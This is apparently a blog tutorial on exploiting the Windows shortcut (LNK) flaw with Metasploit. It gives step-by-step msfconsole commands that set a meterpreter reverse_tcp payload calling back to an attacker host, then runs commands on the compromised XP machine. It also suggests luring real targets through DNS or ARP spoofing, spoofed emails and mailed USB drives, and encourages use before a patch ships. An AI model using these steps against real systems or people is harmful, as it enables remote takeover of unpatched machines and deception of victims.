A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains

what the issue is and also listed a few basic mitigation techniques. Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit. Proof of concept testing: This test was preformed using my BT4 VM which was assigned IP address 192.168.126.135 and a Win XPSP3 VM using IP address 192.168.126.134. Step 1: Load Metasploit and get latest update On my BackTrack4 VM, I browsed to /pentest/exploit/framework3, then load msfconsole once that is loaded run svn update so you can get the latest and greatest.

Fig-1 SVN Update Step 2: Select your Exploit and Payload msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options The show options commands will show you the various parameters that needs to be set in order for the exploit to be functional. In our case its setting up the listening IP and listening port.

Fig-2 Choosing Exploit and Payload Step 3: Fill-in required options and run exploit At this stage you simply fill in the correct IP address and listening port for the machine that you are launching the attack from. If this is not correct the victim machine would not know where to connect back too, since I selected reverse_tcp. msf exploit(ms10_xxx_Windows_shell_lnk_execute) > SET SRVHOST 192.168.126.135 msf exploit(ms10_xxx_Windows_shell_lnk_execute) >SET LHOST 192.168.126.135 msf exploit(ms10_xxx_Windows_shell_lnk_execute) >exploit

Fig-3 Fill-in LHOST and SRVHOST Step 4: Get your victim to click the link or view the malicious file Now at this stage you have to get a bit creative, I can suggest a few things you can try:

Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example. Use a tool like Social Engineering Toolkit SET to send a spoofed email with your malicious link, example. ARP spoof your host network and find a given target thats using Facebook or one of many social networks and try to send them the link that way. Try a far out social engineering attack like purchase several USB drives inject them and mail them to your target with the label free USB drive.

Once you have your targets in sight just sit back and wait, once an exploitation has been kicked off you will see the below;

Fig-4 Successful Exploit Verify you have an active session, session using sessions -l, next connect to that session with sessions -i #, from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XPVM and that it was successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host In the end there is really not much the average user can do that is not aware of your everyday vulnerability, but us as IT professional need to be in the loop so that we can take back the information and make them aware. Lastly the image in figure 6 should be a dead giveaway that something is up with your computer if you didnt connect to a share but all of sudden you see one pop-up its time for a wipe and reinstall. Have fun until Microsoft patches this one and remember to be responsible. All feedback are welcome.